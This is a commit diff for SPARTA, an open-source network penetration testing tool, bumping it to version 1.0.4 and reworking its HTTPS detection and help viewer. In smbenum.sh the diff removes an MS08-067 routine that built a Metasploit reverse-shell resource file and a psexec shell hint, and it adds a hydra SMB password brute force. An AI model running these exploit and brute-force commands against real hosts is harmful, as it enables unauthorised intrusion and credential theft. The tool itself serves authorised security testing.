Commit 45d3cd088c00b8591adc9a0446e9fdfe92f4e7d8 - sparta-scripts

+6

-1

CHANGELOG.txt less more

19	19
20	20	SPARTA 1.0.3 (BETA)
21	21	* fixed the QtWebKit import error (thx alexxn)
22		* fixed ms08-067_check import issue (thx chris948)⏎
	22	* fixed ms08-067_check import issue (thx chris948)
	23
	24	SPARTA 1.0.4 (BETA)
	25	* removed QtWebKit dependency for displaying the help menu
	26	* improved HTTPS/HTTP detection (experimental)
	27	* removed MS08-067 check from smbenum.sh

+22

-41

app/auxiliary.py less more

1	1
2	2	'''
3	3	SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com)
4		Copyright (c) 2015 SECFORCE (Antonio Quina and Leonidas Stavliotis)
	4	Copyright (c) 2019 SECFORCE (Antonio Quina and Leonidas Stavliotis)
5	5
6	6	This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
7	7

10	10	You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
11	11	'''
12	12
13		import os, sys, urllib2, socket, time, datetime, locale, webbrowser, re # for webrequests, screenshot timeouts, timestamps, browser stuff and regex
	13	import os, sys, urllib2, socket, time, datetime, locale, webbrowser, re, requests # for webrequests, screenshot timeouts, timestamps, browser stuff and regex
14	14	from PyQt4 import QtGui, QtCore
15	15	from PyQt4.QtCore import * # for QProcess
16		import errno # temporary for isHttpd
	16	#import errno # temporary for isHttpd
17	17	import subprocess # for screenshots with cutycapt
18	18	import string # for input validation
19	19

38	38	res = (16777216 * o[0]) + (65536 * o[1]) + (256 * o[2]) + o[3]
39	39	return res
40	40
41		# old function, replaced by isHttps (checking for https first is better)
42		def isHttp(url):
	41	# checks if a web port is SSL enabled
	42	def isHttps(ip, port):
	43	headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0'}
43	44	try:
44		req = urllib2.Request(url)
45		req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0')
46		r = urllib2.urlopen(req, timeout=10)
47		#print 'response code: ' + str(r.code)
48		#print 'response content: ' + str(r.read())
49		return True
50
51		except urllib2.HTTPError, e:
52		reason = str(sys.exc_info()[1].reason)
53		# print reason
54		if reason == 'Unauthorized' or reason == 'Forbidden':
55		return True
	45	r = requests.get("https://"+ip+":"+port, headers=headers, verify=False, timeout=5)
	46	return True
	47
	48	except requests.exceptions.SSLError as e:
56	49	return False
57
58		except:
	50
	51	except requests.exceptions.ConnectionError as e:
	52	return False
	53
	54	except requests.exceptions.ReadTimeout as e:
59	55	return False
60
61		def isHttps(ip, port):
62		try:
63		req = urllib2.Request('https://'+ip+':'+port)
64		req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0')
65		r = urllib2.urlopen(req, timeout=5)
66		# print '\nresponse code: ' + str(r.code)
67		# print '\nresponse content: ' + str(r.read())
68		return True
69
70		except:
71		reason = str(sys.exc_info()[1].reason)
72		# print reason
73		# if 'Interrupted system call' in reason:
74		# print 'caught exception. retry?'
75
76		if reason == 'Forbidden':
77		return True
78		return False
79
80
	56
	57	except Exception as e:
	58	print e
	59	return True
	60
81	61	def getTimestamp(human=False):
82	62	t = time.time()
83	63	if human:

276	256	else:
277	257	self.save("http://"+url, ip, port, outputfile)
278	258
279		except:
	259	except Exception as e:
280	260	print '\t[-] Unable to take the screenshot. Moving on..'
	261	print e
281	262	continue
282	263
283	264	self.processing = False

+1

-1

controller/controller.py less more

21	21
22	22	# initialisations that will happen once - when the program is launched
23	23	def __init__(self, view, logic):
24		self.version = 'SPARTA 1.0.3 (BETA)' # update this everytime you commit!
	24	self.version = 'SPARTA 1.0.4 (BETA)' # update this everytime you commit!
25	25	self.logic = logic
26	26	self.view = view
27	27	self.view.setController(self)

+3

-32

scripts/smbenum.sh less more

43	43	echo -e "\n########## Enumerating shares ##########"
44	44	nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP
45	45
46		#echo -e "\n########## Checking for common vulnerabilities ##########"
47		#nmap -Pn -T4 -sS -p139,445 --script=smb-check-vulns $IP
48		#nmap -Pn -T4 -sS -p139,445 --script=smb-check-vulns --script-args=unsafe=1 $IP
49		#echo -e "\nChecking for MS08-067 with metasploit. It could take a while.."
50		#vulnerable=`msfcli exploits/windows/smb/ms08_067_netapi RHOST=$IP C`
51		echo -e "\nChecking for MS08-067.."
52		vulnerable=`python ./scripts/ms08-067_check.py -t $IP -s`
53		echo $vulnerable
	46	echo -e "\n########## Bruteforcing all users with 'password', blank and username as password"
	47	hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1
	48	rm /tmp/$IP-users.txt
54	49
55		#if [[ $vulnerable == "The target is vulnerable" ]]
56		if [[ $vulnerable == "VULNERABLE" ]]
57		then
58		echo "Oh yeah! The target is vulnerable!"
59		MYIP=$(ifconfig $IFACE \| awk -F'[: ]+' '/inet addr:/ {print $4}')
60		echo "use exploits/windows/smb/ms08_067_netapi" > /tmp/$IP-netapi.rc
61		echo "set payload windows/meterpreter/reverse_tcp" >> /tmp/$IP-netapi.rc
62		echo "set RHOST $IP" >> /tmp/$IP-netapi.rc
63		echo "set LHOST $MYIP" >> /tmp/$IP-netapi.rc
64		echo "set LPORT 443" >> /tmp/$IP-netapi.rc
65		echo "set ExitOnSession false" >> /tmp/$IP-netapi.rc
66		echo "exploit -j" >> /tmp/$IP-netapi.rc
67
68		echo -e "\nTo exploit this host now use:"
69		echo -e "msfconsole -r /tmp/$IP-netapi.rc"
70		else
71		echo "The target is NOT vulnerable!"
72		echo -e "\n########## Bruteforcing all users with 'password', blank and username as password"
73		hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1
74		rm /tmp/$IP-users.txt
75
76		echo -e "\n\nTo get a shell use:"
77		echo -e "/usr/local/bin/psexec.py <user>:<password>@$IP cmd.exe\n"
78		fi

+1

-10

sparta.py less more

1	1
2	2	'''
3	3	SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com)
4		Copyright (c) 2018 SECFORCE (Antonio Quina and Leonidas Stavliotis)
	4	Copyright (c) 2019 SECFORCE (Antonio Quina and Leonidas Stavliotis)
5	5
6	6	This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
7	7

25	25	print e
26	26	exit(1)
27	27
28		try:
29		from PyQt4 import QtWebKit
30		except ImportError, e:
31		try:
32		from PySide import QtWebKit
33		except ImportError:
34		print "[-] Import failed. QtWebKit library not found. \nTry installing it with: apt install python-pyside.qtwebkit"
35		exit(1)
36
37	28	from app.logic import *
38	29	from ui.gui import *
39	30	from ui.view import *

+10

-24

ui/view.py less more

1	1
2	2	'''
3	3	SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com)
4		Copyright (c) 2015 SECFORCE (Antonio Quina and Leonidas Stavliotis)
	4	Copyright (c) 2019 SECFORCE (Antonio Quina and Leonidas Stavliotis)
5	5
6	6	This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
7	7

16	16	from PyQt4.QtCore import * # for filters dialog
17	17	except ImportError:
18	18	print "[-] Import failed. PyQt4 library not found. \nTry installing it with: apt install python-qt4"
19
20		try:
21		usePySide = False
22		from PyQt4 import QtWebKit
23		except ImportError, e:
24		try:
25		from PySide import QtWebKit
26		usePySide = True
27		except ImportError, e:
28		print "[-] Import failed. QtWebKit library not found. \nTry installing it with: apt install python-pyside.qtwebkit"
29		exit(1)
30	19
31	20	from ui.gui import *
32	21	from ui.dialogs import *

37	26	from app.processmodels import *
38	27	from app.auxiliary import *
39	28	import time #temp
	29	import webbrowser # to open help page in browser
40	30
41	31	# this class handles everything gui-related
42	32	class View(QtCore.QObject):

62	52	self.importProgressWidget = ProgressWidget('Importing nmap..', self.ui.centralwidget)
63	53	self.adddialog = AddHostsDialog(self.ui.centralwidget)
64	54	self.settingsWidget = AddSettingsDialog(self.ui.centralwidget)
65		self.helpWidget = QtWebKit.QWebView()
66		self.helpWidget.setWindowTitle('SPARTA Help')
67	55
68	56	# kali moves the help file so let's find it
69		url = './doc/help.html'
70		if not os.path.exists(url):
71		url = '/usr/share/doc/sparta/help.html'
72
73		if usePySide:
74		self.helpWidget.load(url)
75		else:
76		self.helpWidget.load(QUrl(url))
77
	57	self.helpurl = './doc/help.html'
	58	if not os.path.exists(self.helpurl):
	59	self.helpurl = '/usr/share/doc/sparta/help.html'
	60
78	61	self.ui.HostsTableView.setSelectionMode(1) # disable multiple selection
79	62	self.ui.ServiceNamesTableView.setSelectionMode(1)
80	63	self.ui.ToolsTableView.setSelectionMode(1)

449	432	self.controller.cancelSettings()
450	433
451	434	def connectHelp(self):
452		self.ui.menuHelp.triggered.connect(self.helpWidget.show)
	435	self.ui.menuHelp.triggered.connect(self.showHelp)
	436
	437	def showHelp(self):
	438	webbrowser.open(self.helpurl)
453	439
454	440	###
455	441